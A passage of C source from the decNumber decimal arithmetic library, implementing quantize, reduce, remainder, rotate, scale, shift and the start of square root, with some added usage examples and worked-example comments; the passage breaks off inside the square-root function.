DECSUBSET if (!set->extended && /* subset math */ decNumberIsNegative(rhs)) { /* was a **-n [hence digits>0] */ /* so divide result into 1 [dac=1/dac] */ decDivideOp(dac, &dnOne, dac, &aset, DIVIDE, &status); } #endif } /* rhs integer path */ /* reduce result to the requested length and copy to result */ decCopyFit(res, dac, set, &residue, &status); decFinish(res, set, &residue, &status); /* final cleanup */ #if DECSUBSET if (!set->extended) decTrim(res, set, 0, &dropped); /* trailing zeros */ #endif } while(0); /* end protected */ if (allocdac!=NULL) free(allocdac); /* drop any storage used */ if (allocinv!=NULL) free(allocinv); /* .. */ #if DECSUBSET if (alloclhs!=NULL) free(alloclhs); /* .. */ if (allocrhs!=NULL) free(allocrhs); /* .. 
*/ #endif if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberPower */ /* ------------------------------------------------------------------ */ /* decNumberQuantize -- force exponent to requested value */ /* */ /* This computes C = op(A, B), where op adjusts the coefficient */ /* of C (by rounding or shifting) such that the exponent (-scale) */ /* of C has exponent of B. The numerical value of C will equal A, */ /* except for the effects of any rounding that occurred. */ /* */ /* res is C, the result. C may be A or B */ /* lhs is A, the number to adjust */ /* rhs is B, the number with exponent to match */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* */ /* Unless there is an error or the result is infinite, the exponent */ /* after the operation is guaranteed to be equal to that of B. */ /* ------------------------------------------------------------------ */ decNumber * decNumberQuantize(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decQuantizeOp(res, lhs, rhs, set, 1, &status); if (status!=0) decStatus(res, status, set); return res; } /* decNumberQuantize */ /* ------------------------------------------------------------------ */ /* decNumberReduce -- remove trailing zeros */ /* */ /* This computes C = 0 + A, and normalizes the result */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ /* Previously known as Normalize */ decNumber * decNumberNormalize(decNumber *res, const decNumber *rhs, decContext *set) { return decNumberReduce(res, rhs, set); } /* decNumberNormalize */ decNumber * decNumberReduce(decNumber *res, const decNumber *rhs, decContext *set) { #if DECSUBSET decNumber *allocrhs=NULL; /* non-NULL if rounded rhs allocated */ #endif uInt status=0; /* as usual */ Int residue=0; /* as usual */ Int dropped; /* work */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif do { /* protect allocated storage */ #if DECSUBSET if (!set->extended) { /* reduce operand and set lostDigits status, as needed */ if (rhs->digits>set->digits) { allocrhs=decRoundOperand(rhs, set, &status); if (allocrhs==NULL) break; rhs=allocrhs; } } #endif /* [following code does not require input rounding] */ /* Infinities copy through; NaNs need usual treatment */ if (decNumberIsNaN(rhs)) { decNaNs(res, rhs, NULL, set, &status); break; } /* reduce result to the requested length and copy to result */ decCopyFit(res, rhs, set, &residue, &status); /* copy & round */ decFinish(res, set, &residue, &status); /* cleanup/set flags */ decTrim(res, set, 1, &dropped); /* normalize in place */ } while(0); /* end protected */ #if DECSUBSET if (allocrhs !=NULL) free(allocrhs); /* .. */ #endif if (status!=0) decStatus(res, status, set);/* then report status */ return res; } /* decNumberReduce */ /* ------------------------------------------------------------------ */ /* decNumberRescale -- force exponent to requested value */ /* */ /* This computes C = op(A, B), where op adjusts the coefficient */ /* of C (by rounding or shifting) such that the exponent (-scale) */ /* of C has the value B. The numerical value of C will equal A, */ /* except for the effects of any rounding that occurred. */ /* */ /* res is C, the result. 
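*/

/* [Editor's sketch] Illustrative use of decNumberPower and             */
/* decNumberQuantize above; a minimal example that is ours and is not   */
/* compiled.  The quantize expectation is the classic 2.170 case from   */
/* the operation's definition.                                          */
#if 0
#define DECNUMDIGITS 34
#include "decNumber.h"
#include <stdio.h>
static void examplePowerQuantize(void) {
  decContext set;
  decNumber a, b, r;
  char out[DECNUMDIGITS+14];
  decContextDefault(&set, DEC_INIT_BASE);
  set.traps=0;
  decNumberFromString(&a, "2", &set);
  decNumberFromString(&b, "3", &set);
  decNumberPower(&r, &a, &b, &set);     /* integer power: expect 8 */
  printf("2**3                  -> %s\n", decNumberToString(&r, out));
  decNumberFromString(&a, "2.17", &set);
  decNumberFromString(&b, "0.001", &set);
  decNumberQuantize(&r, &a, &b, &set);  /* match exponent: expect 2.170 */
  printf("quantize(2.17, 0.001) -> %s\n", decNumberToString(&r, out));
  }
#endif
/*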
C may be A or B */ /* lhs is A, the number to adjust */ /* rhs is B, the requested exponent */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* */ /* Unless there is an error or the result is infinite, the exponent */ /* after the operation is guaranteed to be equal to B. */ /* ------------------------------------------------------------------ */ decNumber * decNumberRescale(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decQuantizeOp(res, lhs, rhs, set, 0, &status); if (status!=0) decStatus(res, status, set); return res; } /* decNumberRescale */ /* ------------------------------------------------------------------ */ /* decNumberRemainder -- divide and return remainder */ /* */ /* This computes C = A % B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X%X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ decNumber * decNumberRemainder(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decDivideOp(res, lhs, rhs, set, REMAINDER, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberRemainder */ /* ------------------------------------------------------------------ */ /* decNumberRemainderNear -- divide and return remainder from nearest */ /* */ /* This computes C = A % B, where % is the IEEE remainder operator */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X%X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ decNumber * decNumberRemainderNear(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decDivideOp(res, lhs, rhs, set, REMNEAR, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberRemainderNear */ /* ------------------------------------------------------------------ */ /* decNumberRotate -- rotate the coefficient of a Number left/right */ /* */ /* This computes C = A rot B (in base ten and rotating set->digits */ /* digits). */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=XrotX) */ /* lhs is A */ /* rhs is B, the number of digits to rotate (-ve to right) */ /* set is the context */ /* */ /* The digits of the coefficient of A are rotated to the left (if B */ /* is positive) or to the right (if B is negative) without adjusting */ /* the exponent or the sign of A. If lhs->digits is less than */ /* set->digits the coefficient is padded with zeros on the left */ /* before the rotate. Any leading zeros in the result are removed */ /* as usual. */ /* */ /* B must be an integer (q=0) and in the range -set->digits through */ /* +set->digits. */ /* C must have space for set->digits digits. */ /* NaNs are propagated as usual. Infinities are unaffected (but */ /* B must be valid). No status is set unless B is invalid or an */ /* operand is an sNaN. 
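*/

/* [Editor's sketch] Illustrative contrast of decNumberRemainder and    */
/* decNumberRemainderNear above; a minimal example that is ours and is  */
/* not compiled.  Remainder uses the integer-divide (truncated)         */
/* quotient; RemainderNear uses the quotient rounded to nearest, so     */
/* its result can be negative.                                          */
#if 0
#define DECNUMDIGITS 34
#include "decNumber.h"
#include <stdio.h>
static void exampleRemainder(void) {
  decContext set;
  decNumber a, b, r;
  char out[DECNUMDIGITS+14];
  decContextDefault(&set, DEC_INIT_BASE);
  set.traps=0;
  decNumberFromString(&a, "10", &set);
  decNumberFromString(&b, "6", &set);
  decNumberRemainder(&r, &a, &b, &set);     /* 10 - 1*6: expect 4 */
  printf("10 rem 6     -> %s\n", decNumberToString(&r, out));
  decNumberRemainderNear(&r, &a, &b, &set); /* 10 - 2*6: expect -2 */
  printf("10 remnear 6 -> %s\n", decNumberToString(&r, out));
  }
#endif
/*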
*/ /* ------------------------------------------------------------------ */ decNumber * decNumberRotate(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ Int rotate; /* rhs as an Int */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif /* NaNs propagate as normal */ if (decNumberIsNaN(lhs) || decNumberIsNaN(rhs)) decNaNs(res, lhs, rhs, set, &status); /* rhs must be an integer */ else if (decNumberIsInfinite(rhs) || rhs->exponent!=0) status=DEC_Invalid_operation; else { /* both numeric, rhs is an integer */ rotate=decGetInt(rhs); /* [cannot fail] */ if (rotate==BADINT /* something bad .. */ || rotate==BIGODD || rotate==BIGEVEN /* .. very big .. */ || abs(rotate)>set->digits) /* .. or out of range */ status=DEC_Invalid_operation; else { /* rhs is OK */ decNumberCopy(res, lhs); /* convert -ve rotate to equivalent positive rotation */ if (rotate<0) rotate=set->digits+rotate; if (rotate!=0 && rotate!=set->digits /* zero or full rotation */ && !decNumberIsInfinite(res)) { /* lhs was infinite */ /* left-rotate to do; 0 < rotate < set->digits */ uInt units, shift; /* work */ uInt msudigits; /* digits in result msu */ Unit *msu=res->lsu+D2U(res->digits)-1; /* current msu */ Unit *msumax=res->lsu+D2U(set->digits)-1; /* rotation msu */ for (msu++; msu<=msumax; msu++) *msu=0; /* ensure high units=0 */ res->digits=set->digits; /* now full-length */ msudigits=MSUDIGITS(res->digits); /* actual digits in msu */ /* rotation here is done in-place, in three steps */ /* 1. shift all to least up to one unit to unit-align final */ /* lsd [any digits shifted out are rotated to the left, */ /* abutted to the original msd (which may require split)] */ /* */ /* [if there are no whole units left to rotate, the */ /* rotation is now complete] */ /* */ /* 2. shift to least, from below the split point only, so that */ /* the final msd is in the right place in its Unit [any */ /* digits shifted out will fit exactly in the current msu, */ /* left aligned, no split required] */ /* */ /* 3. rotate all the units by reversing left part, right */ /* part, and then whole */ /* */ /* example: rotate right 8 digits (2 units + 2), DECDPUN=3. */ /* */ /* start: 00a bcd efg hij klm npq */ /* */ /* 1a 000 0ab cde fgh|ijk lmn [pq saved] */ /* 1b 00p qab cde fgh|ijk lmn */ /* */ /* 2a 00p qab cde fgh|00i jkl [mn saved] */ /* 2b mnp qab cde fgh|00i jkl */ /* */ /* 3a fgh cde qab mnp|00i jkl */ /* 3b fgh cde qab mnp|jkl 00i */ /* 3c 00i jkl mnp qab cde fgh */ /* Step 1: amount to shift is the partial right-rotate count */ rotate=set->digits-rotate; /* make it right-rotate */ units=rotate/DECDPUN; /* whole units to rotate */ shift=rotate%DECDPUN; /* left-over digits count */ if (shift>0) { /* not an exact number of units */ uInt save=res->lsu[0]%powers[shift]; /* save low digit(s) */ decShiftToLeast(res->lsu, D2U(res->digits), shift); if (shift>msudigits) { /* msumax-1 needs >0 digits */ uInt rem=save%powers[shift-msudigits];/* split save */ *msumax=(Unit)(save/powers[shift-msudigits]); /* and insert */ *(msumax-1)=*(msumax-1) +(Unit)(rem*powers[DECDPUN-(shift-msudigits)]); /* .. */ } else { /* all fits in msumax */ *msumax=*msumax+(Unit)(save*powers[msudigits-shift]); /* [maybe *1] */ } } /* digits shift needed */ /* If whole units to rotate... 
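*/
/* [Editor's note] In the worked example above (rotate right 8 with  */
/* DECDPUN=3), the right-rotate count splits into units=2 whole      */
/* units and shift=2 leftover digits; Step 1 above handled the two   */
/* leftover digits, and Steps 2 and 3 below handle the whole units   */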
*/ if (units>0) { /* some to do */ /* Step 2: the units to touch are the whole ones in rotate, */ /* if any, and the shift is DECDPUN-msudigits (which may be */ /* 0, again) */ shift=DECDPUN-msudigits; if (shift>0) { /* not an exact number of units */ uInt save=res->lsu[0]%powers[shift]; /* save low digit(s) */ decShiftToLeast(res->lsu, units, shift); *msumax=*msumax+(Unit)(save*powers[msudigits]); } /* partial shift needed */ /* Step 3: rotate the units array using triple reverse */ /* (reversing is easy and fast) */ decReverse(res->lsu+units, msumax); /* left part */ decReverse(res->lsu, res->lsu+units-1); /* right part */ decReverse(res->lsu, msumax); /* whole */ } /* whole units to rotate */ /* the rotation may have left an undetermined number of zeros */ /* on the left, so true length needs to be calculated */ res->digits=decGetDigits(res->lsu, msumax-res->lsu+1); } /* rotate needed */ } /* rhs OK */ } /* numerics */ if (status!=0) decStatus(res, status, set); return res; } /* decNumberRotate */ /* ------------------------------------------------------------------ */ /* decNumberSameQuantum -- test for equal exponents */ /* */ /* res is the result number, which will contain either 0 or 1 */ /* lhs is a number to test */ /* rhs is the second (usually a pattern) */ /* */ /* No errors are possible and no context is needed. */ /* ------------------------------------------------------------------ */ decNumber * decNumberSameQuantum(decNumber *res, const decNumber *lhs, const decNumber *rhs) { Unit ret=0; /* return value */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, DECUNCONT)) return res; #endif if (SPECIALARGS) { if (decNumberIsNaN(lhs) && decNumberIsNaN(rhs)) ret=1; else if (decNumberIsInfinite(lhs) && decNumberIsInfinite(rhs)) ret=1; /* [anything else with a special gives 0] */ } else if (lhs->exponent==rhs->exponent) ret=1; decNumberZero(res); /* OK to overwrite an operand now */ *res->lsu=ret; return res; } /* decNumberSameQuantum */ /* ------------------------------------------------------------------ */ /* decNumberScaleB -- multiply by a power of 10 */ /* */ /* This computes C = A x 10**B where B is an integer (q=0) with */ /* maximum magnitude 2*(emax+digits) */ /* */ /* res is C, the result. C may be A or B */ /* lhs is A, the number to adjust */ /* rhs is B, the requested power of ten to use */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* */ /* The result may underflow or overflow. */ /* ------------------------------------------------------------------ */ decNumber * decNumberScaleB(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { Int reqexp; /* requested exponent change [B] */ uInt status=0; /* accumulator */ Int residue; /* work */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif /* Handle special values except lhs infinite */ if (decNumberIsNaN(lhs) || decNumberIsNaN(rhs)) decNaNs(res, lhs, rhs, set, &status); /* rhs must be an integer */ else if (decNumberIsInfinite(rhs) || rhs->exponent!=0) status=DEC_Invalid_operation; else { /* lhs is a number; rhs is a finite with q==0 */ reqexp=decGetInt(rhs); /* [cannot fail] */ if (reqexp==BADINT /* something bad .. */ || reqexp==BIGODD || reqexp==BIGEVEN /* .. very big .. */ || abs(reqexp)>(2*(set->digits+set->emax))) /* .. 
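*/
/* [Editor's note] e.g. with digits=34 and emax=6144 (the decimal128 */
/* parameters) the bound just tested is 2*(34+6144) = 12356          */
/* ..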
or out of range */ status=DEC_Invalid_operation; else { /* rhs is OK */ decNumberCopy(res, lhs); /* all done if infinite lhs */ if (!decNumberIsInfinite(res)) { /* prepare to scale */ res->exponent+=reqexp; /* adjust the exponent */ residue=0; decFinalize(res, set, &residue, &status); /* .. and check */ } /* finite LHS */ } /* rhs OK */ } /* rhs finite */ if (status!=0) decStatus(res, status, set); return res; } /* decNumberScaleB */ /* ------------------------------------------------------------------ */ /* decNumberShift -- shift the coefficient of a Number left or right */ /* */ /* This computes C = A << B or C = A >> -B (in base ten). */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X<<X) */ /* lhs is A */ /* rhs is B, the number of digits to shift (-ve to right) */ /* set is the context */ /* */ /* The digits of the coefficient of A are shifted to the left (if B */ /* is positive) or to the right (if B is negative) without adjusting */ /* the exponent or the sign of A. */ /* */ /* B must be an integer (q=0) and in the range -set->digits through */ /* +set->digits. */ /* C must have space for set->digits digits. */ /* NaNs are propagated as usual. Infinities are unaffected (but */ /* B must be valid). No status is set unless B is invalid or an */ /* operand is an sNaN. */ /* ------------------------------------------------------------------ */ decNumber * decNumberShift(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ Int shift; /* rhs as an Int */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif /* NaNs propagate as normal */ if (decNumberIsNaN(lhs) || decNumberIsNaN(rhs)) decNaNs(res, lhs, rhs, set, &status); /* rhs must be an integer */ else if (decNumberIsInfinite(rhs) || rhs->exponent!=0) status=DEC_Invalid_operation; else { /* both numeric, rhs is an integer */ shift=decGetInt(rhs); /* [cannot fail] */ if (shift==BADINT /* something bad .. */ || shift==BIGODD || shift==BIGEVEN /* .. very big .. */ || abs(shift)>set->digits) /* .. or out of range */ status=DEC_Invalid_operation; else { /* rhs is OK */ decNumberCopy(res, lhs); if (shift!=0 && !decNumberIsInfinite(res)) { /* something to do */ if (shift>0) { /* to left */ if (shift==set->digits) { /* removing all */ *res->lsu=0; /* so place 0 */ res->digits=1; /* .. */ } else { /* */ /* first remove leading digits if necessary */ if (res->digits+shift>set->digits) { decDecap(res, res->digits+shift-set->digits); /* that updated res->digits; may have gone to 1 (for a */ /* single digit or for zero */ } if (res->digits>1 || *res->lsu) /* if non-zero.. */ res->digits=decShiftToMost(res->lsu, res->digits, shift); } /* partial left */ } /* left */ else { /* to right */ if (-shift>=res->digits) { /* discarding all */ *res->lsu=0; /* so place 0 */ res->digits=1; /* .. */ } else { decShiftToLeast(res->lsu, D2U(res->digits), -shift); res->digits-=(-shift); } } /* to right */ } /* non-0 non-Inf shift */ } /* rhs OK */ } /* numerics */ if (status!=0) decStatus(res, status, set); return res; } /* decNumberShift */ /* ------------------------------------------------------------------ */ /* decNumberSquareRoot -- square root operator */ /* */ /* This computes C = squareroot(A) */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context; note that rounding mode has no effect */ /* */ /* C must have space for set->digits digits. 
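*/

/* [Editor's sketch] Illustrative use of decNumberScaleB and            */
/* decNumberShift above; a minimal example that is ours and is not      */
/* compiled.  The shift expectations assume the 9-digit base context:   */
/* the coefficient is padded to 9 digits before a left shift, and       */
/* digits shifted off the left are discarded.                           */
#if 0
#define DECNUMDIGITS 34
#include "decNumber.h"
#include <stdio.h>
static void exampleScaleShift(void) {
  decContext set;
  decNumber a, b, r;
  char out[DECNUMDIGITS+14];
  decContextDefault(&set, DEC_INIT_BASE); /* digits=9 */
  set.traps=0;
  decNumberFromString(&a, "7.50", &set);
  decNumberFromString(&b, "3", &set);
  decNumberScaleB(&r, &a, &b, &set);  /* x 10**3: expect 7.50E+3 */
  printf("scaleb(7.50, 3) -> %s\n", decNumberToString(&r, out));
  decNumberFromString(&a, "34", &set);
  decNumberFromString(&b, "8", &set);
  decNumberShift(&r, &a, &b, &set);   /* left in 9 digits: 400000000 */
  printf("shift(34, 8)    -> %s\n", decNumberToString(&r, out));
  decNumberFromString(&b, "-1", &set);
  decNumberShift(&r, &a, &b, &set);   /* right one digit: expect 3 */
  printf("shift(34, -1)   -> %s\n", decNumberToString(&r, out));
  }
#endif
/*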
*/
/* ------------------------------------------------------------------ */
/* This uses the following varying-precision algorithm in:            */
/*                                                                    */
/* Properly Rounded Variable Precision Square Root, T. E. Hull and    */
/* A. Abrham, ACM Transactions on Mathematical Software, Vol 11 #3,   */
/* pp229-237, ACM, September 1985.                                    */
/*                                                                    */
/* The square-root is calculated using Newton's method, after which   */
/* a check is made to ensure the result is correctly rounded.         */
/*                                                                    */
/* % [Reformatted original Numerical Turing source code follows.]     */
/* function sqrt(x : real) : real                                     */
/* % sqrt(x) returns the properly rounded approximation to the square */
/* % root of x, in the precision of the calling environment, or it    */
/* % fails if x < 0.                                                  */
/* % t e hull and a abrham, august, 1984                              */
/* if x <= 0 then                                                     */
/*   if x < 0 then                                                    */
/*     assert false                                                   */
/*   else                                                             */
/*     result 0                                                       */
/*   end if                                                           */
/* end if                                                             */
/* var f := setexp(x, 0)  % fraction part of x   [0.1 <= x < 1]       */
/* var e := getexp(x)     % exponent part of x                        */
/* var approx : real                                                  */
/* if e mod 2 = 0 then                                                */
/*   approx := .259 + .819 * f   % approx to root of f                */
/* else                                                               */
/*   f := f/10                   % adjustments                        */
/*   e := e + 1                  % for odd                            */
/*   approx := .0819 + 2.59 * f  % exponent                           */
/* end if                                                             */
/*                                                                    */
/* var p:= 3                                                          */
/* const maxp := currentprecision + 2                                 */
/* loop                                                               */
/*   p := min(2*p - 2, maxp)     % p = 4,6,10, ..., maxp              */
/*   precision p                                                      */
/*   approx := .5 * (approx + f/approx)                               */
/*   exit when p = maxp                                               */
/* end loop                                                           */
/*                                                                    */
/* % approx is now within 1 ulp of the properly rounded square root   */
/* % of f; to ensure proper rounding, compare squares of (approx -    */
/* % 1/2 ulp) and (approx + 1/2 ulp) with f.                          */
/* p := currentprecision                                              */
/* begin                                                              */
/*   precision p + 2                                                  */
/*   const approxsubhalf := approx - setexp(.5, -p)                   */
/*   if mulru(approxsubhalf, approxsubhalf) > f then                  */
/*     approx := approx - setexp(.1, -p + 1)                          */
/*   else                                                             */
/*     const approxaddhalf := approx + setexp(.5, -p)                 */
/*     if mulrd(approxaddhalf, approxaddhalf) < f then                */
/*       approx := approx + setexp(.1, -p + 1)                        */
/*     end if                                                         */
/*   end if                                                           */
/* end                                                                */
/* result setexp(approx, e div 2)  % fix exponent                     */
/* end sqrt                                                           */
/* ------------------------------------------------------------------ */
decNumber * decNumberSquareRoot(decNumber *res, const decNumber *rhs,
                                decContext *set) {
  decContext workset, approxset;     /* work contexts */
  decNumber dzero;                   /* used for constant zero */
  Int maxp;                          /* largest working precision */
  Int workp;                         /* working precision */
  Int residue=0;                     /* rounding residue */
  uInt status=0, ignore=0;           /* status accumulators */
  uInt rstatus;                      /* .. */
  Int exp;                           /* working exponent */
  Int ideal;                         /* ideal (preferred) exponent */
  Int needbytes;                     /* work */
  Int dropped;                       /* ..
*/ #if DECSUBSET decNumber *allocrhs=NULL; /* non-NULL if rounded rhs allocated */ #endif /* buffer for f [needs +1 in case DECBUFFER 0] */ decNumber buff[D2N(DECBUFFER+1)]; /* buffer for a [needs +2 to match likely maxp] */ decNumber bufa[D2N(DECBUFFER+2)]; /* buffer for temporary, b [must be same size as a] */ decNumber bufb[D2N(DECBUFFER+2)]; decNumber *allocbuff=NULL; /* -> allocated buff, iff allocated */ decNumber *allocbufa=NULL; /* -> allocated bufa, iff allocated */ decNumber *allocbufb=NULL; /* -> allocated bufb, iff allocated */ decNumber *f=buff; /* reduced fraction */ decNumber *a=bufa; /* approximation to result */ decNumber *b=bufb; /* intermediate result */ /* buffer for temporary variable, up to 3 digits */ decNumber buft[D2N(3)]; decNumber *t=buft; /* up-to-3-digit constant or work */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif do { /* protect allocated storage */ #if DECSUBSET if (!set->extended) { /* reduce operand and set lostDigits status, as needed */ if (rhs->digits>set->digits) { allocrhs=decRoundOperand(rhs, set, &status); if (allocrhs==NULL) break; /* [Note: 'f' allocation below could reuse this buffer if */ /* used, but as this is rare they are kept separate for clarity.] */ rhs=allocrhs; } } #endif /* [following code does not require input rounding] */ /* handle infinities and NaNs */ if (SPECIALARG) { if (decNumberIsInfinite(rhs)) { /* an infinity */ if (decNumberIsNegative(rhs)) status|=DEC_Invalid_operation; else decNumberCopy(res, rhs); /* +Infinity */ } else decNaNs(res, rhs, NULL, set, &status); /* a NaN */ break; } /* calculate the ideal (preferred) exponent [floor(exp/2)] */ /* [We would like to write: ideal=rhs->exponent>>1, but this */ /* generates a compiler warning. Generated code is the same.] */ ideal=(rhs->exponent&~1)/2; /* target */ /* handle zeros */ if (ISZERO(rhs)) { decNumberCopy(res, rhs); /* could be 0 or -0 */ res->exponent=ideal; /* use the ideal [safe] */ /* use decFinish to clamp any out-of-range exponent, etc. */ decFinish(res, set, &residue, &status); break; } /* any other -x is an oops */ if (decNumberIsNegative(rhs)) { status|=DEC_Invalid_operation; break; } /* space is needed for three working variables */ /* f -- the same precision as the RHS, reduced to 0.01->0.99... */ /* a -- Hull's approximation -- precision, when assigned, is */ /* currentprecision+1 or the input argument precision, */ /* whichever is larger (+2 for use as temporary) */ /* b -- intermediate temporary result (same size as a) */ /* if any is too long for local storage, then allocate */ workp=MAXI(set->digits+1, rhs->digits); /* actual rounding precision */ maxp=workp+2; /* largest working precision */ needbytes=sizeof(decNumber)+(D2U(rhs->digits)-1)*sizeof(Unit); if (needbytes>(Int)sizeof(buff)) { allocbuff=(decNumber *)malloc(needbytes); if (allocbuff==NULL) { /* hopeless -- abandon */ status|=DEC_Insufficient_storage; break;} f=allocbuff; /* use the allocated space */ } /* a and b both need to be able to hold a maxp-length number */ needbytes=sizeof(decNumber)+(D2U(maxp)-1)*sizeof(Unit); if (needbytes>(Int)sizeof(bufa)) { /* [same applies to b] */ allocbufa=(decNumber *)malloc(needbytes); allocbufb=(decNumber *)malloc(needbytes); if (allocbufa==NULL || allocbufb==NULL) { /* hopeless */ status|=DEC_Insufficient_storage; break;} a=allocbufa; /* use the allocated spaces */ b=allocbufb; /* .. 
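*/
/* [Editor's note] Worked example of the reduction and initial       */
/* approximation below: for rhs=567, f=0.567 and exp=3; exp is odd,  */
/* so f becomes 0.0567 and exp becomes 4, and the first approx is    */
/* 0.0819 + 2.59*0.0567 = 0.2288 (true sqrt(0.0567) = 0.2381...);    */
/* the final exponent adjustment by exp/2 = 2 then gives             */
/* sqrt(567) = 23.81...                                              */
/* ..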
*/
      }

    /* copy rhs -> f, save exponent, and reduce so 0.1 <= f < 1 */
    decNumberCopy(f, rhs);
    exp=f->exponent+f->digits;       /* adjusted to Hull rules */
    f->exponent=-(f->digits);        /* to range */

    /* set up working context */
    decContextDefault(&workset, DEC_INIT_DECIMAL64);
    /* [Until further notice, no error is possible and status bits */
    /* (Rounded, etc.) should be ignored, not accumulated.] */

    /* Calculate initial approximation, and allow for odd exponent */
    workset.digits=workp;            /* p for initial calculation */
    t->bits=0; t->digits=3;
    a->bits=0; a->digits=3;
    if ((exp & 1)==0) {              /* even exponent */
      /* Set t=0.259, a=0.819 */
      t->exponent=-3;
      a->exponent=-3;
#if DECDPUN>=3
      t->lsu[0]=259;
      a->lsu[0]=819;
#elif DECDPUN==2
      t->lsu[0]=59; t->lsu[1]=2;
      a->lsu[0]=19; a->lsu[1]=8;
#else
      t->lsu[0]=9; t->lsu[1]=5; t->lsu[2]=2;
      a->lsu[0]=9; a->lsu[1]=1; a->lsu[2]=8;
#endif
      }
     else {                          /* odd exponent */
      /* Set t=0.0819, a=2.59 */
      f->exponent--;                 /* f=f/10 */
      exp++;                         /* e=e+1 */
      t->exponent=-4;
      a->exponent=-2;
#if DECDPUN>=3
      t->lsu[0]=819;
      a->lsu[0]=259;
#elif DECDPUN==2
      t->lsu[0]=19; t->lsu[1]=8;
      a->lsu[0]=59; a->lsu[1]=2;
#else
      t->lsu[0]=9; t->lsu[1]=1; t->lsu[2]=8;
      a->lsu[0]=9; a->lsu[1]=5; a->lsu[2]=2;
#endif
      }

    decMultiplyOp(a, a, f, &workset, &ignore); /* a=a*f */
    decAddOp(a, a, t, &workset, 0, &ignore);   /* ..+t */
    /* [a is now the initial approximation for sqrt(f), calculated with */
    /* currentprecision, which is also a's precision.] */

    /* the main calculation loop */
    decNumberZero(&dzero);           /* make 0 */
    decNumberZero(t);                /* set t = 0.5 */
    t->lsu[0]=5;                     /* .. */
    t->exponent=-1;                  /* .. */
    workset.digits=3;                /* initial p */
    for (;;) {
      /* set p to min(2*p - 2, maxp) [hence 3; or: 4, 6, 10, ... , maxp] */
      workset.digits=workset.digits*2-2;
      if (workset.digits>maxp) workset.digits=maxp;
      /* a = 0.5 * (a + f/a) */
      /* [calculated at p then rounded to currentprecision] */
      decDivideOp(b, f, a, &workset, DIVIDE, &ignore); /* b=f/a */
      decAddOp(b, b, a, &workset, 0, &ignore);         /* b=b+a */
      decMultiplyOp(a, b, t, &workset, &ignore);       /* a=b*0.5 */
      if (a->digits==maxp) break;    /* have required digits */
      } /* loop */

    /* Here, 0.1 <= a < 1 [Hull], and a has maxp digits */

    /* now reduce to length, etc.; this needs to be done with a */
    /* having the correct exponent so as to handle subnormals */
    /* correctly */
    approxset=*set;                  /* get emin, emax, etc. */
    approxset.round=DEC_ROUND_HALF_EVEN;
    a->exponent+=exp/2;              /* set correct exponent */
    rstatus=0;                       /* clear status */
    residue=0;                       /* .. and accumulator */
    decCopyFit(a, a, &approxset, &residue, &rstatus); /* reduce (if needed) */
    decFinish(a, &approxset, &residue, &rstatus);     /* clean and finalize */

    /* Overflow was possible if the input exponent was out-of-range, */
    /* in which case quit */
    if (rstatus&DEC_Overflow) {
      status=rstatus;                /* use the status as-is */
      decNumberCopy(res, a);         /* copy to result */
      break;
      }

    /* Preserve status except Inexact/Rounded */
    status|=(rstatus & ~(DEC_Rounded|DEC_Inexact));

    /* Carry out the Hull correction */
    a->exponent-=exp/2;              /* back to 0.1->1 */

    /* a is now at final precision and within 1 ulp of the properly */
    /* rounded square root of f; to ensure proper rounding, compare */
    /* squares of (a - 1/2 ulp) and (a + 1/2 ulp) with f.
